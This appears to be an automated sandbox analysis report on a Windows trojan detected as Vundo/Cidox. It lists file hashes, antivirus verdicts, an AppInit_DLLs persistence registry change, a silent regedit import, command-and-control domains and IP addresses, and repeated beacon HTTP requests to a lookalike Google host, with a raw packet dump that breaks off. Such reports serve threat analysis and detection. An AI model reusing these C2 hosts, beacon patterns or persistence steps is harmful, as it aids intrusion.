Analysis Date | 2014-12-21 17:01:30 |
---|---|
MD5 | 04d6c87bc5128ece18e7ea49fbc16d82 |
SHA1 | a01ed115bfac92fabf4679f3f8d86e6290a0b5ea |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 5da4bab728b5bea6949d94d89b5c9de9 sha1: 600ac9bb0d1c6bee165d5318800b7599c0ff3742 size: 27136 | |
Section | .rdata md5: d064eb1d9859b2486ebba8fa8e695cb0 sha1: a24d91e096de13882d5a8747a7c94b5de841967e size: 7680 | |
Section | .data md5: cba969fd083d72eda735679569df81b7 sha1: b5356fd63bc3ab5456b6c2ba7cda3ca352c2c520 size: 5120 | |
Section | .rsrc md5: 266c52478d16e258367b73f5ebf6cf5c sha1: d453c6feafe6feaf2360979e25c440ae1b3696b4 size: 406016 | |
Timestamp | 2012-11-29 17:44:00 | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | 22782c1111141b117c911e6b105a9cf17b91f0aa | |
IMPhash | bcbfefffacb508a2cf625400da40f22d | |
AV | 360 Safe | Gen:Variant.Symmi.7206 |
AV | Ad-Aware | Gen:Variant.Symmi.7206 |
AV | Alwil (avast) | Crypt-OXO [Trj] |
AV | Arcabit (arcavir) | Gen:Variant.Symmi.7206 |
AV | Authentium | W32/Cidox.A.gen!Eldorado |
AV | Avira (antivir) | TR/Drop.Vundo.voua |
AV | BullGuard | Gen:Variant.Symmi.7206 |
AV | CA (E-Trust Ino) | no_virus |
AV | CAT (quickheal) | Trojan.Vundo.Gen |
AV | ClamAV | WIN.Trojan.Cidox-1000 |
AV | Dr. Web | Trojan.Inject1.14679 |
AV | Emsisoft | Gen:Variant.Symmi.7206 |
AV | Eset (nod32) | Win32/Kryptik.APTP |
AV | Fortinet | W32/Kryptik.APTP!tr |
AV | Frisk (f-prot) | W32/Cidox.A.gen!Eldorado |
AV | F-Secure | Gen:Variant.Symmi.7206 |
AV | Grisoft (avg) | Generic_r.BNL |
AV | Ikarus | Trojan-Dropper.Win32.Vundo |
AV | K7 | Backdoor ( 04c531cb1 ) |
AV | Kaspersky | Trojan.Win32.Generic |
AV | MalwareBytes | no_virus |
AV | Mcafee | no_virus |
AV | Microsoft Security Essentials | TrojanDropper:Win32/Vundo.V |
AV | MicroWorld (escan) | Gen:Variant.Symmi.7206 |
AV | Rising | no_virus |
AV | Sophos | no_virus |
AV | Symantec | no_virus |
AV | Trend Micro | TROJ_VUNDO.SMKK |
AV | VirusBlokAda (vba32) | Backdoor.Cidox |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
---|---|
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Process
↳ C:\WINDOWS\Explorer.EXE
Registry | HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL |
---|---|
Creates File | C:\WINDOWS\system32\jqkjigg.dll |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Cookies\cf |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Creates Process | C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Winsock DNS | detoxist.com |
Winsock DNS | clickbeta.ru |
Winsock DNS | 91.220.35.154 |
Winsock DNS | veroconma.com |
Winsock DNS | terrans.su |
Winsock DNS | getinball.com |
Winsock DNS | theloamva.com |
Winsock DNS | tryatdns.com |
Winsock DNS | clickclans.ru |
Winsock DNS | dentagod.com |
Winsock DNS | denareclick.com |
Winsock DNS | debijonda.com |
Winsock DNS | fescheck.com |
Winsock DNS | liteworns.com |
Winsock DNS | getintsu.com |
Winsock DNS | nshouse1.com |
Winsock DNS | vengibit.com |
Winsock DNS | tryangets.com |
Winsock DNS | netrovad.com |
Winsock DNS | vornedix.com |
Winsock DNS | inzavora.com |
Winsock DNS | getavodes.com |
Winsock DNS | googbeds.com |
Winsock DNS | clickstano.com |
Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\jqkjigg.dll\\x00 |
---|
Network Details:
DNS | detoxist.com Type: A 141.8.225.80 |
---|---|
DNS | debijonda.com Type: A 141.8.225.80 |
DNS | veroconma.com Type: A 74.117.179.241 |
DNS | theloamva.com Type: A 141.8.225.80 |
DNS | vornedix.com Type: A 141.8.225.80 |
DNS | dentagod.com Type: A 141.8.225.80 |
DNS | liteworns.com Type: A 141.8.225.80 |
DNS | vengibit.com Type: A 141.8.225.80 |
DNS | tryangets.com Type: A 141.8.225.80 |
DNS | getintsu.com Type: A 209.222.14.3 |
DNS | getavodes.com Type: A 209.222.14.3 |
DNS | inzavora.com Type: A 209.222.14.3 |
DNS | googbeds.com Type: A |
DNS | getinball.com Type: A |
DNS | tryatdns.com Type: A |
DNS | fescheck.com Type: A |
DNS | netrovad.com Type: A |
DNS | terrans.su Type: A |
DNS | clickstano.com Type: A |
DNS | denareclick.com Type: A |
DNS | clickbeta.ru Type: A |
DNS | nshouse1.com Type: A |
DNS | clickclans.ru Type: A |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE3AwJ5rIVt4b User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE3qqUGBSDArN User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE3Ty/Kkl6I5R User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE3Ty/Kkl6I5R User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE35k189R3Z+J User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE35k189R3Z+J User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE91YPO4yATM3 User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE6NqE7LPJWfi User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE6NqE7LPJWfi User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE6NqE7LPJWfi User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwExV/pFEBgjnW User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE6NqE7LPJWfi User-Agent: |
HTTP GET | http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE0kYoGs6AkVa User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1032 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1033 ➝ 74.117.179.241:80 |
Flows TCP | 192.168.1.1:1034 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1035 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1036 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1037 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1038 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1039 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1040 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1041 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1042 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1043 ➝ 91.220.35.154:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 31332661 XX0000&key=313&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37343426 6f733d35 2e312e32 3630302e 744&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f6b 74774a7a 734a4f6a 55566b56 yg/ktwJzsJOjUVkV 0x000000b0 (00176) 69326b77 64574f78 35536b2b 6a514f63 i2kwdWOx5Sk+jQOc 0x000000c0 (00192) 77453341 774a3572 49567434 62204854 wE3AwJ5rIVt4b HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 31332661 XX0000&key=313&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37343426 6f733d35 2e312e32 3630302e 744&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f6b 74774a7a 734a4f6a 55566b56 yg/ktwJzsJOjUVkV 0x000000b0 (00176) 69326b77 64574f78 35536b2b 6a514f63 i2kwdWOx5Sk+jQOc 0x000000c0 (00192) 77453371 71554742 53444172 4e204854 wE3qqUGBSDArN HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 31332661 XX0000&key=313&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37343426 6f733d35 2e312e32 3630302e 744&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f6b 74774a7a 734a4f6a 55566b56 yg/ktwJzsJOjUVkV 0x000000b0 (00176) 69326b77 64574f78 35536b2b 6a514f63 i2kwdWOx5Sk+jQOc 0x000000c0 (00192) 77453354 792f4b6b 6c364935 52204854 wE3Ty/Kkl6I5R HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 31332661 XX0000&key=313&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37343426 6f733d35 2e312e32 3630302e 744&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f6b 74774a7a 734a4f6a 55566b56 yg/ktwJzsJOjUVkV 0x000000b0 (00176) 69326b77 64574f78 35536b2b 6a514f63 i2kwdWOx5Sk+jQOc 0x000000c0 (00192) 77453354 792f4b6b 6c364935 52204854 wE3Ty/Kkl6I5R HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 31332661 XX0000&key=313&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37343426 6f733d35 2e312e32 3630302e 744&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f6b 74774a7a 734a4f6a 55566b56 yg/ktwJzsJOjUVkV 0x000000b0 (00176) 69326b77 64574f78 35536b2b 6a514f63 i2kwdWOx5Sk+jQOc 0x000000c0 (00192) 77453335 6b313839 52335a2b 4a204854 wE35k189R3Z+J HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 31332661 XX0000&key=313&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37343426 6f733d35 2e312e32 3630302e 744&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f6b 74774a7a 734a4f6a 55566b56 yg/ktwJzsJOjUVkV 0x000000b0 (00176) 69326b77 64574f78 35536b2b 6a514f63 i2kwdWOx5Sk+jQOc 0x000000c0 (00192) 77453335 6b313839 52335a2b 4a204854 wE35k189R3Z+J HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 31332661 XX0000&key=313&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37343426 6f733d35 2e312e32 3630302e 744&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f6b 74774a7a 734a4f6a 55566b56 yg/ktwJzsJOjUVkV 0x000000b0 (00176) 69326b77 64574f78 35536b2b 6a514f63 i2kwdWOx5Sk+jQOc 0x000000c0 (00192) 77453931 59504f34 7941544d 33204854 wE91YPO4yATM3 HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 31332661 XX0000&key=313&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37343426 6f733d35 2e312e32 3630302e 744&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f6b 74774a7a 734a4f6a 55566b56 yg/ktwJzsJOjUVkV 0x000000b0 (00176) 69326b77 64574f78 35536b2b 6a514f63 i2kwdWOx5Sk+jQOc 0x000000c0 (00192) 7745364e 7145374c 504a5766 69204854 wE6NqE7LPJWfi HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 31332661 XX0000&key=313&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37343426 6f733d35 2e312e32 3630302e 744&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f6b 74774a7a 734a4f6a 55566b56 yg/ktwJzsJOjUVkV 0x000000b0 (00176) 69326b77 64574f78 35536b2b 6a514f63 i2kwdWOx5Sk+jQOc 0x000000c0 (00192) 7745364e 7145374c 504a5766 69204854 wE6NqE7LPJWfi HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 31332661 XX0000&key=313&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37343426 6f733d35 2e312e32 3630302e 744&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f6b 74774a7a 734a4f6a 55566b56 yg/ktwJzsJOjUVkV 0x000000b0 (00176) 69326b77 64574f78 35536b2b 6a514f63 i2kwdWOx5Sk+jQOc 0x000000c0 (00192) 7745364e 7145374c 504a5766 69204854 wE6NqE7LPJWfi HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 31332661 XX0000&key=313&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37343426 6f733d35 2e312e32 3630302e 744&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f6b 74774a7a 734a4f6a 55566b56 yg/ktwJzsJOjUVkV 0x000000b0 (00176) 69326b77 64574f78 35536b2b 6a514f63 i2kwdWOx5Sk+jQOc 0x000000c0 (00192) 77457856 2f704645 42676a6e 57204854 wExV/pFEBgjnW HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 31332661 XX0000&key=313&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37343426 6f733d35 2e312e32 3630302e 744&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 3d437643 3&z=458&hash=CvC 0x00000070 (00112) 6e426a56 6a38494f 4d333341 394c664f nBjVj8IOM33A9LfO 0x00000080 (00128) 4764426b 6e6a7939 61577a41 4a464538 GdBknjy9aWzAJFE8 0x00000090 (00144) 4a783772 48745554 37765a36 317a6757 Jx7rHtUT7vZ61zgW 0x000000a0 (00160) 79672f6b 74774a7a 734a4f6a 55566b56 yg/ktwJzsJOjUVkV 0x000000b0 (00176) 69326b77 64574f78 35536b2b 6a514f63 i2kwdWOx5Sk+jQOc 0x000000c0 (00192) 7745364e 7145374c 504a5766 69204854 wE6NqE7LPJWfi HT 0x000000d0 (00208) 54502f31 2e310d0a 486f7374 3a20616e TP/1.1..Host: an 0x000000e0 (00224) 616c7973 74696373 2e676f6f 676c652e alystics.google. 0x000000f0 (00240) 636f6d0d 0a0d0a com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 31332661 XX0000&key=313&a 0x00000040 (00064) 763d3026 766d3d30 26616c3d 3026703d v=0&vm=0&al=0&p= 0x00000050 (00080) 37343426 6f733d35 2e312e32 3630302e 744&os=5.1.2600. 0x00000060 (00096) 33267a3d 34353826 68617368 